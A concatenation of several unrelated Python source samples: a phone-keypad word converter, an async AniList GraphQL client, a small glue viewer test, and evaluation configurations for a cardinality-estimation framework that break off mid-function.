print('...testing iter values for {0}.{1} of type {2}'.format(sType,s,type(xAttribute).__name__))
for x in xAttribute:
lTested = check_pickle(x, lTested)
print('...finished testing iter values for {0}.{1}'.format(sType,s))
try:
xAttribute.__dict__
except AttributeError:
pass
else:
#this attribute should be explored seperately...
lTested = check_pickle(xAttribute, lTested)
continue
print(0, xThing, xAttribute)
pickle.dumps(xAttribute)
print('Testing {0} as complete object'.format(sType))
pickle.dumps(xThing)
return lTested
| StarcoderdataPython |
3202695 | import time
from functools import lru_cache
from trie import PrefixTree
class NumberConverter(object):
def __init__(self):
self.trie = PrefixTree()
with open('words_en.txt') as file:
lines = [line.rstrip('\n') for line in file]
for line in lines:
self.trie.insert(line)
def number_to_valid_phone_words(self, num):
if '1' in num or '0' in num:
raise Exception('Numbers with 1 and 0 are currently not supported.')
# 1: Find all words of length equivalent to given string that can be formed
words = []
for prefix in self.num_to_chars(num[0]):
words.extend(self.trie.starts_with(prefix, len(num)))
# 2: Convert words to number equivalents eg 'cat' -> '228'
possible_words = []
for word in words:
converted_num = self.words_to_nums(word)
# 3: We add this word to results if this is equivalent to given number
if num == converted_num:
possible_words.append(word)
return possible_words
@staticmethod
def num_to_chars(num):
keymap = {'2': ['a', 'b', 'c'],
'3': ['d', 'e', 'f'],
'4': ['g', 'h', 'i'],
'5': ['j', 'k', 'l'],
'6': ['m', 'n', 'o'],
'7': ['p', 'q', 'r', 's'],
'8': ['t', 'u', 'v'],
'9': ['w', 'x', 'y', 'z']}
return keymap[num] if num in keymap else None
@lru_cache(maxsize=10000)
def words_to_nums(self, word):
keymap = {
'a': '2', 'b': '2', 'c': '2',
'd': '3', 'e': '3', 'f': '3',
'g': '4', 'h': '4', 'i': '4',
'j': '5', 'k': '5', 'l': '5',
'm': '6', 'n': '6', 'o': '6',
'p': '7', 'q': '7', 'r': '7', 's': '7',
't': '8', 'u': '8', 'v': '8',
'w': '9', 'x': '9', 'y': '9', 'z': '9'
}
for char, num in keymap.items():
word = word.replace(char, num)
return word
converter = NumberConverter()
print('****First Run****')
for n in ['228', '888', '2382']:
start = time.time()
print(n, converter.number_to_valid_phone_words(n))
end = time.time()
print('Processing time in milliseconds:', int((end - start) * 1000))
print('****Second Run****')
for n in ['228', '888', '2382']:
start = time.time()
print(n, converter.number_to_valid_phone_words(n))
end = time.time()
print('Processing time in milliseconds:', int((end - start) * 1000))
| StarcoderdataPython |
1812996 | <filename>miku/http.py
import asyncio
from typing import Any, Dict, Union
import aiohttp
from .query import Query, QueryFields, QueryOperation
from .fields import *
from .media import Anime, Manga, Media
from .character import Character
from .paginator import Paginator
from .user import User
from .image import Image
from .errors import AniListServerError, HTTPException, mapping
__all__ = (
'HTTPHandler',
)
class HTTPHandler:
URL = 'https://graphql.anilist.co'
def __init__(self, loop: asyncio.AbstractEventLoop, session: aiohttp.ClientSession=None) -> None:
if session:
ret = 'Expected an aiohttp.ClientSession instance but got {0.__class__.__name__!r} instead'
raise TypeError(ret.format(session))
self.session = session
self.loop = loop
self.token = None
def parse_args(self, id: Union[int, str]):
operation_variables = {}
variables = {}
arguments = {}
if isinstance(id, str):
operation_variables['$search'] = 'String'
arguments['search'] = '$search'
variables['search'] = id
else:
operation_variables['$id'] = 'Int'
arguments['id'] = '$id'
variables['id'] = id
return operation_variables, variables, arguments
async def create_session(self):
self.session = session = aiohttp.ClientSession(loop=self.loop)
return session
async def get_access_token_from_pin(self, pin: str, client_id: str, client_secret: str) -> str:
json = {
'grant_type': 'authorization_code',
'client_id': client_id,
'client_secret': client_secret,
'code': pin,
}
if not self.session:
self.session = await self.create_session()
async with self.session.post('https://anilist.co/api/v2/oauth/token', json=json) as response:
data = await response.json()
return data['access_token']
async def request(self, query: str, variables: Dict[str, Any]):
headers = {
'Content-Type': 'application/json',
'Accept': 'application/json',
}
if self.token:
headers['Authorization'] = 'Bearer ' + self.token
url = self.URL
session = self.session
if not session:
session = await self.create_session()
payload = {
'query': query,
'variables': variables
}
for retry in range(5):
async with session.post(url, json=payload, headers=headers) as response:
try:
data = await response.json()
except aiohttp.ContentTypeError:
pass
if response.status == 500:
await asyncio.sleep(retry * 2)
continue
if response.status == 429:
retry_after = response.headers['Retry-After']
await asyncio.sleep(int(retry_after))
continue
if data.get('errors'):
cls = mapping.get(data['errors'][0]['status'], HTTPException)
raise cls(data)
return data
raise AniListServerError('Internal server error')
async def close(self):
if not self.session:
return None
return await self.session.close()
async def get_thread_from_user_id(self, user_id: int):
operation = QueryOperation(
type="query",
variables={"$userId": "Int"}
)
fields = QueryFields("Thread", userId='$userId')
for field in THREAD_FIELDS:
fields.add_field(field)
query = Query(operation, fields)
query = query.build()
variables = {
'userId': user_id,
}
return await self.request(query, variables)
async def get_thread(self, id: Union[str, int]):
operation_variables, variables, arguments = self.parse_args(id)
operation = QueryOperation(
type="query",
variables=operation_variables
)
fields = QueryFields("Thread", **arguments)
for field in THREAD_FIELDS:
fields.add_field(field)
query = Query(operation, fields)
query = query.build()
return await self.request(query, variables)
async def get_thread_comments(self, id: int):
operation_variables, variables, arguments = self.parse_args(id)
operation = QueryOperation(
type="query",
variables=operation_variables
)
fields = QueryFields("ThreadComment", **arguments)
for field in COMMENT_FIELDS:
fields.add_field(field)
query = Query(operation, fields)
query = query.build()
return await self.request(query, variables)
async def get_user(self, search: str):
operation = QueryOperation(
type="query",
variables={"$search": "String"}
)
fields = QueryFields("User", search='$search')
for field in USER_FIELDS:
fields.add_field(field)
# media = ' '.join(ANIME_FIELDS)
# characters = ' '.join(CHARACTER_FIELDS)
# studios = ' '.join(STUDIO_FIELDS)
# anime = 'anime { nodes {' + media + ' } }'
# manga = 'manga { nodes {' + media + ' } }'
# # character = 'characters { nodes {' + characters + ' } }'
# fields.add_field('favourites', '\n'.join((anime, manga)))
query = Query(operation, fields)
query = query.build()
variables = {
'search': search,
}
return await self.request(query, variables)
async def get_media(self, search: str, type: str=None):
operation = QueryOperation(
type="query",
variables={"$search": "String"}
)
fields = QueryFields("Media", search='$search')
if type:
fields.arguments['type'] = type
for field in ANIME_FIELDS:
fields.add_field(field)
fields.add_field('characters', 'nodes {' + ' '.join(CHARACTER_FIELDS) + ' }')
fields.add_field('studios', 'nodes {' + ' '.join(STUDIO_FIELDS) + ' }')
query = Query(operation, fields)
query = query.build()
variables = {
'search': search,
}
return await self.request(query, variables)
async def get_anime(self, search: str):
return await self.get_media(search, 'ANIME')
async def get_manga(self, search: str):
return await self.get_media(search, 'MANGA')
async def get_studio(self, search: str):
operation = QueryOperation(
type="query",
variables={"$search": "String"}
)
fields = QueryFields("Studio", search='$search')
for field in STUDIO_FIELDS:
fields.add_field(field)
fields.add_field('media', 'nodes {' + ' '.join(ANIME_FIELDS) + ' }')
query = Query(operation, fields)
query = query.build()
variables = {
'search': search,
}
return await self.request(query, variables)
async def get_staff(self, search: str):
operation = QueryOperation(
type="query",
variables={"$search": "String"}
)
fields = QueryFields("Staff", search='$search')
for field in STAFF_FIELDS:
fields.add_field(field)
fields.add_field('characters', 'nodes {' + ' '.join(CHARACTER_FIELDS) + ' }')
query = Query(operation, fields)
query = query.build()
variables = {
'search': search,
}
return await self.request(query, variables)
async def get_site_statisics(self):
operation = QueryOperation(
type='query',
variables={}
)
fields = QueryFields('SiteStatistics')
for field in SITE_STATISTICS_FIELDS:
fields.add_field(field)
query = Query(operation, fields)
query = query.build()
return await self.request(query, {})
def get_users(self, search: str, *, per_page: int=5, page: int=0):
operation = QueryOperation(
type="query",
variables={"$page": "Int", "$perPage": "Int", "$search": "String"}
)
fields = QueryFields("Page", page="$page", perPage="$perPage")
fields.add_field("pageInfo", "total", "currentPage", "lastPage", "hasNextPage", "perPage")
field = fields.add_field('users', *USER_FIELDS, search='$search')
# media = ' '.join(ANIME_FIELDS)
# characters = ' '.join(CHARACTER_FIELDS)
# studios = ' '.join(STUDIO_FIELDS)
# staff = ' '.join(STAFF_FIELDS)
# anime = 'anime { nodes {' + media + ' }}'
# manga = 'manga { nodes {' + media + ' }}'
# character = 'characters { nodes {' + characters + ' }}'
# studio = 'studios { nodes {' + studios + ' }}'
# staff = 'staff { nodes {' + staff + ' }}'
# field.add_field('favourites', ' '.join((anime, manga, character, studio, staff)))
query = Query(operation, fields)
query = query.build()
variables = {
'search': search,
'page': page,
'perPage': per_page
}
return Paginator(self, 'users', query, variables, User)
def get_medias(self, search: str, type: str=None, *, per_page: int=5, page: int=0):
operation = QueryOperation(
type="query",
variables={"$page": "Int", "$perPage": "Int", "$search": "String"}
)
fields = QueryFields("Page", page="$page", perPage="$perPage")
fields.add_field("pageInfo", "total", "currentPage", "lastPage", "hasNextPage", "perPage")
field = fields.add_field("media", *ANIME_FIELDS, search='$search')
if type:
field.arguments['type'] = type
field.add_field('characters', 'nodes {' + ' '.join(CHARACTER_FIELDS) + ' }')
query = Query(operation=operation, fields=fields)
query = query.build()
variables = {
'search': search,
'page': page,
'perPage': per_page
}
cls = Media
if type == 'ANIME':
cls = Anime
else:
cls = Manga
return Paginator(self, 'media', query, variables, cls)
def get_animes(self, search: str, *, per_page: int=5, page: int=0):
return self.get_medias(search, 'ANIME', per_page=per_page, page=page)
def get_mangas(self, search: str, *, per_page: int=5, page: int=0):
return self.get_medias(search, 'MANGA', per_page=per_page, page=page)
def get_characters(self, search: str, *, per_page: int=5, page: int=0):
operation = QueryOperation(
type="query",
variables={"$page": "Int", "$perPage": "Int", "$search": "String"}
)
fields = QueryFields("Page", page="$page", perPage="$perPage")
fields.add_field("pageInfo", "total", "currentPage", "lastPage", "hasNextPage", "perPage")
field = fields.add_field("characters", *CHARACTER_FIELDS, search='$search')
field.add_field('media', 'nodes {' + ' '.join(ANIME_FIELDS) + ' }')
query = Query(operation=operation, fields=fields)
query = query.build()
variables = {
'search': search,
'page': page,
'perPage': per_page
}
return Paginator(self, 'characters', query, variables, Character)
async def get_character(self, search: str):
operation = QueryOperation(
type="query",
variables={"$search": "String"}
)
fields = QueryFields("Character", search='$search')
for field in CHARACTER_FIELDS:
fields.add_field(field)
fields.add_field('media', 'nodes {' + ' '.join(ANIME_FIELDS) + ' }')
query = Query(operation, fields)
query = query.build()
variables = {
'search': search,
}
return await self.request(query, variables) | StarcoderdataPython |
6416880 | def test_contour_levels(app, data_image):
viewer = app.imshow(data=data_image)
widget_state = viewer._layout_layer_options.layers[0]['layer_panel']
layer_state = widget_state.layer_state
layer_state.level_mode = "Custom"
widget_state.c_levels_txt = '1e2, 1e3, 0.1, .1'
assert layer_state.levels == [100, 1000, 0.1, 0.1]
assert widget_state.c_levels_txt == '1e2, 1e3, 0.1, .1'
layer_state.levels = [10, 100]
assert widget_state.c_levels_txt == '10, 100'
| StarcoderdataPython |
1771662 | # Copyright 2020 The Private Cardinality Estimation Framework Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Evaluation configurations."""
import itertools
import math
import numpy as np
from wfa_cardinality_estimation_evaluation_framework.estimators import bloom_filter_sketch_operators
from wfa_cardinality_estimation_evaluation_framework.estimators import bloom_filters
from wfa_cardinality_estimation_evaluation_framework.estimators import estimator_noisers
from wfa_cardinality_estimation_evaluation_framework.estimators import exact_set
from wfa_cardinality_estimation_evaluation_framework.estimators import hyper_log_log
from wfa_cardinality_estimation_evaluation_framework.estimators import independent_set_estimator
from wfa_cardinality_estimation_evaluation_framework.estimators import liquid_legions
from wfa_cardinality_estimation_evaluation_framework.estimators import meta_estimators
from wfa_cardinality_estimation_evaluation_framework.estimators import same_key_aggregator
from wfa_cardinality_estimation_evaluation_framework.estimators import stratified_sketch
from wfa_cardinality_estimation_evaluation_framework.estimators import vector_of_counts
from wfa_cardinality_estimation_evaluation_framework.estimators import vector_of_counts_sketch_operator
from wfa_cardinality_estimation_evaluation_framework.evaluations.configs import EvaluationConfig
from wfa_cardinality_estimation_evaluation_framework.evaluations.configs import ScenarioConfig
from wfa_cardinality_estimation_evaluation_framework.evaluations.configs import SketchEstimatorConfig
from wfa_cardinality_estimation_evaluation_framework.simulations import frequency_set_generator
from wfa_cardinality_estimation_evaluation_framework.simulations import set_generator
SKETCH = 'sketch'
SKETCH_CONFIG = 'sketch_config'
SKETCH_EPSILON = 'sketch_epsilon'
ESTIMATOR = 'estimator'
ESTIMATE_EPSILON = 'estimate_epsilon'
MAX_FREQUENCY = 'max_frequency'
SKETCH_ESTIMATOR_CONFIG_NAMES_FORMAT = (
SKETCH, SKETCH_CONFIG, ESTIMATOR, SKETCH_EPSILON, ESTIMATE_EPSILON,
MAX_FREQUENCY)
NUM_RUNS_VALUE = 100
SMOKE_TEST_UNIVERSE_SIZE = 200_000
UNIVERSE_SIZE_VALUE = 1_000_000
NUM_SETS_VALUE = 20
# Smoke test reach percent.
SMALL_REACH_RATE_SMOKE_TEST = 0.1
LARGE_REACH_RATE_SMOKE_TEST = 0.2
# Complete reach estimator evaluation reach percent.
SMALL_REACH_RATE_VALUE = 0.01
LARGE_REACH_RATE_VALUE = 0.2
# Global DP stress test.
US_INTERNET_POPULATION = 2_000_000_000
REACH_STRESS_TEST = [1_000, 10_000, 100_000, 1_000_000, 10_000_000]
# Frequency test reach percent.
REACH_RATE_FREQ_END_TO_END_TEST = 0.1
REACH_RATE_FREQ_SMOKE_TEST = 0.1
SHARED_PROP_LIST_VALUE = (0.25, 0.5, 0.75)
REMARKETING_RATE_VALUE = 0.2
NUM_SETS_VALUE_FREQ = 10
SET_SIZE_FOR_FREQ = 20_000
FREQ_UNIVERSE_SIZE = 200_000
NO_GLOBAL_DP_STR = 'no_global_dp'
GLOBAL_DP_STR = 'global_dp'
NO_LOCAL_DP_STR = 'no_local_dp'
LOCAL_DP_STR = 'local_dp'
GEOMETRIC_NOISE = 'geometric_noise'
GAUSSIAN_NOISE = 'gaussian_noise'
# The None in the epsilon value is used to tell the sketch estimator constructor
# that we do not want to noise the sketch.
SKETCH_EPSILON_VALUES = (math.log(3), math.log(3) / 4, math.log(3) / 10, None)
# The current simulator module add noise to the estimated cardinality so as to
# mimic the global differential privacy use case. In the real world, the
# implementation could be different and more complicated.
# As such, we use a small epsilon so as to be conservative on the result.
ESTIMATE_EPSILON_VALUES = (math.log(3), None)
GLOBAL_DP_LIMIT_TEST_EPSILON_VALUES = [
math.log(3) / x for x in [
1, 2, 4, 10, 100, 200, 300, 400, 500, 600, 700, 800, 900, 1000,
2000, 3000, 4000, 5000, 6000, 7000, 8000, 9000, 10000]
]
# When we would like to split budget over multiple queries, having delta greater
# than zero is often helpful in allowing us to use smaller amount of noise.
ESTIMATE_EPSILON_DELTA_VALUES = [
(math.log(3), 1e-5), (math.log(3), 1e-6), (math.log(3), 1e-7), (None, None)
]
# The number of estimate queries for which the budget will be split over.
NUM_ESTIMATE_QUERIES_VALUES = [
1, 2, 4, 10, 100, 200, 300, 400, 500, 600, 700, 800, 900, 1_000, 2_000,
3_000, 4_000, 5_000, 6_000, 7_000, 8_000, 9_000, 10_000, 50_000, 100_000,
500_000, 1_000_000
]
# The number of decimal points to keep of the epsilon part of the
# SketchEstimatorConfig name.
EPSILON_DECIMALS = 4
EPSILON_DECIMALS_LIMIT_TEST = 8
# The number of decimal points to keep of the delta part of the
# SketchEstimatorConfig name.
DELTA_DECIMALS = 7
# The length of the Any Distribution Bloom Filters.
# We use the np.array with dtype so as to make sure that the lengths are all
# integers.
ADBF_LENGTH_LIST = np.array([100_000, 250_000], dtype=np.int64)
EXP_ADBF_DECAY_RATE = 10
STRATIFIED_EXP_ADBF_EPSILON_SPLIT = 0.5
SKETCH_OPERATOR_EXPECTATION = 'expectation'
SKETCH_OPERATOR_BAYESIAN = 'bayesian'
SKETCH_OPERATOR_LIST = [SKETCH_OPERATOR_EXPECTATION, SKETCH_OPERATOR_BAYESIAN]
GEO_LENGTH_PROB_PRODUCT = 2
# The length of the bloom filters.
BLOOM_FILTERS_LENGTH_LIST = np.array([5_000_000], dtype=np.int64)
VOC_LENGTH_LIST = np.array([1024, 4096], dtype=np.int64)
# Document the evaluation configurations.
def _smoke_test(num_runs=NUM_RUNS_VALUE,
universe_size=SMOKE_TEST_UNIVERSE_SIZE):
"""Smoke test evaluation configurations.
We set the smoke test parameters according to Appendix 3: Example
Parameters of Scenarios of the Cardinality and Frequency Estimation
Evaluation Framework.
Args:
num_runs: the number of runs per scenario.
universe_size: the size of universe.
Returns:
An EvaluationConfig.
"""
set_size = int(universe_size * LARGE_REACH_RATE_SMOKE_TEST)
seq_corr_set_size = int(universe_size * SMALL_REACH_RATE_SMOKE_TEST)
return EvaluationConfig(
name='smoke_test',
num_runs=num_runs,
scenario_config_list=(
ScenarioConfig(
name='independent',
set_generator_factory=(
set_generator.IndependentSetGenerator.
get_generator_factory_with_num_and_size(
universe_size=universe_size, num_sets=20,
set_size=set_size))),
ScenarioConfig(
name='remarketing',
set_generator_factory=(
set_generator.IndependentSetGenerator.
get_generator_factory_with_num_and_size(
universe_size=int(universe_size * REMARKETING_RATE_VALUE),
num_sets=20, set_size=set_size))),
ScenarioConfig(
name='fully_overlapping',
set_generator_factory=(
set_generator.FullyOverlapSetGenerator.
get_generator_factory_with_num_and_size(
universe_size=universe_size, num_sets=20,
set_size=set_size))),
ScenarioConfig(
name='sequentially_correlated_all',
set_generator_factory=(
set_generator.SequentiallyCorrelatedSetGenerator
.get_generator_factory_with_num_and_size(
order=set_generator.ORDER_ORIGINAL,
correlated_sets=set_generator.CORRELATED_SETS_ALL,
num_sets=20, set_size=seq_corr_set_size,
shared_prop=0.5))),
ScenarioConfig(
name='sequentially_correlated_one',
set_generator_factory=(
set_generator.SequentiallyCorrelatedSetGenerator
.get_generator_factory_with_num_and_size(
order=set_generator.ORDER_ORIGINAL,
correlated_sets=set_generator.CORRELATED_SETS_ONE,
num_sets=20, set_size=seq_corr_set_size,
shared_prop=0.5))),
)
)
def _frequency_smoke_test(num_runs=NUM_RUNS_VALUE,
universe_size=FREQ_UNIVERSE_SIZE):
"""Smoke test frequency evaluation configurations.
Args:
num_runs: the number of runs per scenario.
universe_size: the size of the universe.
Returns:
An EvaluationConfig.
"""
set_size = int(universe_size * REACH_RATE_FREQ_SMOKE_TEST)
return EvaluationConfig(
name='frequency_smoke_test',
num_runs=num_runs,
scenario_config_list=(
ScenarioConfig(
name='homogeneous',
set_generator_factory=(
frequency_set_generator.HomogeneousMultiSetGenerator
.get_generator_factory_with_num_and_size(
universe_size=universe_size, num_sets=10,
set_size=set_size, freq_rates=[1]*10, freq_cap=3))),
ScenarioConfig(
name='heterogeneous',
set_generator_factory=(
frequency_set_generator.HeterogeneousMultiSetGenerator
.get_generator_factory_with_num_and_size(
universe_size=universe_size, num_sets=10,
set_size=set_size, gamma_params=[[1, 1]]*10,
freq_cap=3))),
ScenarioConfig(
name='publisher_constant',
set_generator_factory=(
frequency_set_generator.PublisherConstantFrequencySetGenerator
.get_generator_factory_with_num_and_size(
universe_size=universe_size, num_sets=10,
set_size=set_size, frequency=3))),
)
)
def _get_default_name_to_choices_of_set_size_list(
small_set_size,
large_set_size,
num_sets
):
return {
'all_small': [small_set_size] * num_sets,
'all_large': [large_set_size] * num_sets,
'1st_small_then_large': (
[small_set_size] + [large_set_size] * (num_sets - 1)),
'1st_half_small_2nd_half_large': (
[small_set_size] * int(num_sets / 2) +
[large_set_size] * (num_sets - int(num_sets / 2))),
'small_then_last_large': (
[small_set_size] * (num_sets - 1) + [large_set_size]),
'gradually_smaller': [
int(large_set_size / np.sqrt(i + 1)) for i in range(num_sets)]
}
def _generate_configs_scenario_1_2(universe_size, num_sets, small_set_size,
large_set_size, remarketing_rate=None):
"""Generate configs of Scenario 1 & 2
In this scenario, publishers have heterogeneous users reach probability.
The reach probability of a user in a publisher is the same as that in other
publishers.
If remarketing_rate is not provided, we take it as scenario 1 with universe_size
as total. Othersize, we take it as scenario 2 with remarketing size as
int(universe_size*remarketing_rate)
See scenario 1 / 2:
Independent m-publishers / n-publishers independently serve a remarketing list
https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#scenario-1-independence-m-publishers-with-homogeneous-user-reach-probability
Returns:
A list of ScenarioConfigs of scenario 1 / 2 with selected parameters.
"""
name_to_choices_of_set_size_list = _get_default_name_to_choices_of_set_size_list(
small_set_size, large_set_size, num_sets
)
scenario_config_list = []
if remarketing_rate is None:
key_words = ['independent']
size = universe_size
else:
size = int(universe_size * remarketing_rate)
key_words = ['remarketing', 'remarketing_size:' + str(size)]
for set_type, set_size_list in name_to_choices_of_set_size_list.items():
scenario_config_list.append(
ScenarioConfig(
name='-'.join(key_words + [
'universe_size:' + str(universe_size),
'small_set:' + str(small_set_size),
'large_set:' + str(large_set_size),
'set_type:' + set_type]),
set_generator_factory=(
set_generator.IndependentSetGenerator
.get_generator_factory_with_set_size_list(
universe_size=size,
set_size_list=set_size_list)))
)
return scenario_config_list
def _generate_configs_scenario_3(universe_size, num_sets, small_set_size,
large_set_size, user_activity_assciation):
"""Generate configs of Scenario 3(a/b).
In this scenario, publishers have heterogeneous users reach probability.
The reach probability of a user in a publisher is the same as that in other
publishers.
See scenario 3. [m-publishers with heterogeneous users reach probability] for more details:
https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#scenario-3-m-publishers-with-heterogeneous-users-reach-probability
Args:
universe_size: the size of the pools from which the IDs will be selected.
num_sets: the number of sets.
small_set_size: the reach of the small reach sets.
large_set_size: the reach of the large reach sets.
user_activity_assciation: user activity association used in the Exponential
Bow model. Should be one of the defined user activity association defined
by the set_generator.USER_ACTIVITY_ASSOCIATION_XXX.
For 3(a) user_activity_assciation=set_generator.USER_ACTIVITY_ASSOCIATION_INDEPENDENT
3(b) USER_ACTIVITY_ASSOCIATION_IDENTICAL
Returns:
A list of ScenarioConfigs of scenario 3(a/b) with selected parameters.
"""
name_to_choices_of_set_size_list = _get_default_name_to_choices_of_set_size_list(
small_set_size, large_set_size, num_sets
)
scenario_config_list = []
for set_type, set_size_list in name_to_choices_of_set_size_list.items():
scenario_config_list.append(
ScenarioConfig(
name='-'.join([
'exponential_bow',
'user_activity_association:' + str(user_activity_assciation),
'universe_size:' + str(universe_size),
'small_set:' + str(small_set_size),
'large_set:' + str(large_set_size),
'set_type:' + set_type]),
set_generator_factory=(
set_generator.ExponentialBowSetGenerator
.get_generator_factory_with_set_size_list(
user_activity_association=user_activity_assciation,
universe_size=universe_size,
set_size_list=set_size_list)))
)
return scenario_config_list
def _generate_configs_scenario_4a(universe_size, num_sets, small_set_size,
large_set_size):
"""Generate configs of Scenario 4(a).
In this setting, all the sets are identical.
See Scenario 4: Full overlap or disjoint for more details:
https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#scenario-4-full-overlap-or-disjoint
Args:
universe_size: the size of the pools from which the IDs will be selected.
num_sets: the number of sets.
small_set_size: the reach of the small reach sets.
large_set_size: the reach of the large reach sets.
Returns:
A list of ScenarioConfigs of scenario 4(a) with either small or large
reach.
"""
scenario_config_list = []
for set_size in [small_set_size, large_set_size]:
scenario_config_list.append(
ScenarioConfig(
name='-'.join([
'fully_overlapped',
'universe_size:' + str(universe_size),
'num_sets:' + str(num_sets),
'set_sizes:' + str(set_size)
]),
set_generator_factory=(
set_generator.FullyOverlapSetGenerator
.get_generator_factory_with_num_and_size(
universe_size=universe_size,
num_sets=num_sets,
set_size=set_size)))
)
return scenario_config_list
def _generate_configs_scenario_4b(universe_size, num_sets, small_set_size,
large_set_size, order):
"""Generate configs of Scenario 4(b).
In this scenario, sets are overlapped. That is, a small set is a subset of a
large set.
Currently only support a small set contained in a large set.
Need to update set_generator.py to support more flexible set sizes.
See Scenario 4: Full overlap or disjoint for more details:
https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#scenario-4-full-overlap-or-disjoint
Args:
universe_size: the size of the pools from which the IDs will be selected.
num_sets: the number of sets.
small_set_size: the reach of the small reach sets.
large_set_size: the reach of the large reach sets.
order: the order of the sets. Should be one of set_generator.ORDER_XXX.
Returns:
A list of ScenarioConfigs of scenario 4(b) with subset sets.
"""
scenario_config_list = []
for num_large_sets in [1, int(num_sets / 2), num_sets - 1]:
scenario_config_list.append(
ScenarioConfig(
name='-'.join([
'subset',
'universe_size:' + str(universe_size),
'order:' + str(order),
'num_large_sets:' + str(num_large_sets),
'num_small_sets:' + str(num_sets - num_large_sets),
'large_set_size:' + str(large_set_size),
'small_set_size:' + str(small_set_size),
]),
set_generator_factory=(
set_generator.SubSetGenerator
.get_generator_factory_with_num_and_size(
order=order,
universe_size=universe_size,
num_large_sets=num_large_sets,
num_small_sets=num_sets - num_large_sets,
large_set_size=large_set_size,
small_set_size=small_set_size)))
)
return scenario_config_list
def _generate_configs_scenario_5(num_sets, small_set_size,
large_set_size, order, shared_prop_list):
"""Generate configs of Scenario 5.
In this scenario, the sets are sequentially correlated.
See Scenario 5: Sequentially correlated campaigns for more details:
https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#scenario-5-sequentially-correlated-campaigns
Args:
num_sets: the number of sets.
small_set_size: the reach of the small reach sets.
large_set_size: the reach of the large reach sets.
order: the order of the sets. Should be one of set_generator.ORDER_XXX.
shared_prop_list: a sequence of the shared proportion of sequentially
correlated sets.
Returns:
A list of ScenarioConfigs of scenario 5 Sequentiall correlated sets.
"""
name_to_choices_of_set_size_list = {
**_get_default_name_to_choices_of_set_size_list(
small_set_size, large_set_size, num_sets
),
'large_then_last_small': [large_set_size] * (num_sets - 1) + [
small_set_size],
'all_large_except_middle_small': (
[large_set_size] * int(num_sets / 2) + [small_set_size]
+ [large_set_size] * (num_sets - 1 - int(num_sets / 2))),
'1st_large_then_small': [large_set_size] + [small_set_size] * (
num_sets - 1),
'all_small_except_middle_large': (
[small_set_size] * int(num_sets / 2) + [large_set_size]
+ [small_set_size] * (num_sets - 1 - int(num_sets / 2))),
'1st_half_large_2nd_half_small': (
[large_set_size] * int(num_sets / 2)
+ [small_set_size] * (num_sets - int(num_sets / 2))),
'repeated_small_large': (
[small_set_size, large_set_size] * int(num_sets / 2)
+ ([] if num_sets % 2 == 0 else [small_set_size]))
}
scenario_config_list = []
for correlated_sets in (set_generator.CORRELATED_SETS_ONE,
set_generator.CORRELATED_SETS_ALL):
for shared_prop in shared_prop_list:
for set_type, set_size_list in name_to_choices_of_set_size_list.items():
scenario_config_list.append(
ScenarioConfig(
name='-'.join([
'sequentially_correlated',
'order:' + str(order),
'correlated_sets:' + str(correlated_sets),
'shared_prop:' + str(shared_prop),
'set_type:' + str(set_type),
'large_set_size:' + str(large_set_size),
'small_set_size:' + str(small_set_size)
]),
set_generator_factory=(
set_generator.SequentiallyCorrelatedSetGenerator.
get_generator_factory_with_set_size_list(
order=order,
correlated_sets=correlated_sets,
shared_prop=shared_prop,
set_size_list=set_size_list)))
)
return scenario_config_list
def _generate_freq_configs_scenario_1(universe_size, num_sets, set_size):
"""Generate configs of Frequency Scenario 1.
See Frequency Scenario 1: Homogeneous user activities within a publisher for more details:
https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#frequency-scenario-1-homogeneous-user-activities-within-a-publisher-1
Args:
universe_size: the universal size of reach
num_sets: the number of sets
set_size: size of each set, assuming they're all equal
Returns:
A list of ScenarioConfigs of freq scenario 1 Homogeneous user activities within a publisher correlated sets.
"""
freq_rate_lists = [0.5, 1, 1.5, 2]
freq_cap_lists = [3, 5, 10]
scenario_config_list = []
for freq_rate, freq_cap in itertools.product(freq_rate_lists, freq_cap_lists):
scenario_config_list.append(
ScenarioConfig(
name='-'.join([
'homogeneous',
'universe_size:' + str(universe_size),
'num_sets:' + str(num_sets),
'freq_rate:' + str(freq_rate),
'freq_cap:' + str(freq_cap),
]),
set_generator_factory=(
frequency_set_generator.HomogeneousMultiSetGenerator.
get_generator_factory_with_num_and_size(
universe_size=universe_size, num_sets=num_sets,
set_size=set_size, freq_rates=[freq_rate]*num_sets,
freq_cap=freq_cap
))),
)
return scenario_config_list
def _generate_freq_configs_scenario_2(universe_size, num_sets, set_size):
"""Generate configs of Frequency Scenario 2.
See Frequency Scenario 2: Heterogeneous user frequency.:
https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#frequency-scenario-2-heterogeneous-user-frequency-1
Args:
universe_size: the universal size of reach
num_sets: the number of sets
set_size: size of each set, assuming they're all equal
Returns:
A list of ScenarioConfigs of freq scenario 2 heterogeneous user frequency.
"""
distribution_rate_lists = [0.5, 1, 1.5, 2]
freq_cap_lists = [3, 5, 10]
scenario_config_list = []
for distribution_rate, freq_cap in itertools.product(
distribution_rate_lists, freq_cap_lists):
scenario_config_list.append(
ScenarioConfig(
name='-'.join([
'heterogeneous',
'universe_size:' + str(universe_size),
'num_sets:' + str(num_sets),
'distribution_rate:' + str(distribution_rate),
'freq_cap:' + str(freq_cap),
]),
set_generator_factory=(
frequency_set_generator.HeterogeneousMultiSetGenerator.
get_generator_factory_with_num_and_size(
universe_size=universe_size, num_sets=num_sets,
set_size=set_size,
gamma_params=[[1,distribution_rate]]*num_sets,
